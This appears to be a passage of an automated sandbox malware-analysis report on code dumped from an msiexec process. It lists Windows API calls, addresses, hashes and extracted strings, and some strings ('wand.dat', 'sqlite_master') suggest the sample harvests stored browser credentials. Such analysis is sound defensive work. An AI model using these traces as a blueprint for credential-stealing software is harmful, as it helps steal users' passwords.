                                                                                                        • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                        • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                        • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                        • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040560C
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                        • String ID: *.*$dat$wand.dat
                                                                                                        • API String ID: 2618321458-1828844352
                                                                                                        • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                        • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                        • wcslen.MSVCRT ref: 00410C74
                                                                                                        • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1549203181-0
                                                                                                        • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                        • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                        • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                        • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00412057
                                                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3550944819-0
                                                                                                        • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                        • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                        APIs
                                                                                                        • free.MSVCRT ref: 0040F561
                                                                                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$free
                                                                                                        • String ID: g4@
                                                                                                        • API String ID: 2888793982-2133833424
                                                                                                        • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                        • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                        • memset.MSVCRT ref: 0040AF18
                                                                                                        • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865533344-0
                                                                                                        • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                        • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                        • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                        • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004144E7
                                                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                        • memset.MSVCRT ref: 0041451A
                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1127616056-0
                                                                                                        • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                        • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                        • memset.MSVCRT ref: 0042FED3
                                                                                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: sqlite_master
                                                                                                        • API String ID: 438689982-3163232059
                                                                                                        • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                        • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                        • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                        • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                        APIs
                                                                                                        • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                        • wcscpy.MSVCRT ref: 00414DF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3917621476-0
                                                                                                        • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                        • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                        • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                        • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • _snwprintf.MSVCRT ref: 0041100C
                                                                                                        • wcscat.MSVCRT ref: 0041101F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 822687973-0
                                                                                                        • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                        • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                        • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                        • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                        • malloc.MSVCRT ref: 00417459
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                                        • free.MSVCRT ref: 0041747F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2605342592-0
                                                                                                        • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                        • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                        • RegisterClassW.USER32(?), ref: 00412428
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2678498856-0
                                                                                                        • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                        • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 3888421826-0
                                                                                                        • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                        • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                        • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                        • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00417B7B
                                                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                        • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3727323765-0
                                                                                                        • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                        • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                        • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                        • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F673
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2754987064-0
                                                                                                        • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                        • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D

APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0

APIs
• memset.MSVCRT ref: 00402FD7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
• strlen.MSVCRT ref: 00403006
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$CloseHandle
• String ID: General
• API String ID: 3722638380-26480598

APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0

APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0

APIs
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0

APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223

APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689

APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• _memicmp.MSVCRT ref: 0040C00D
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123

APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750

APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: F^@
• API String ID: 568519121-3652327722

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
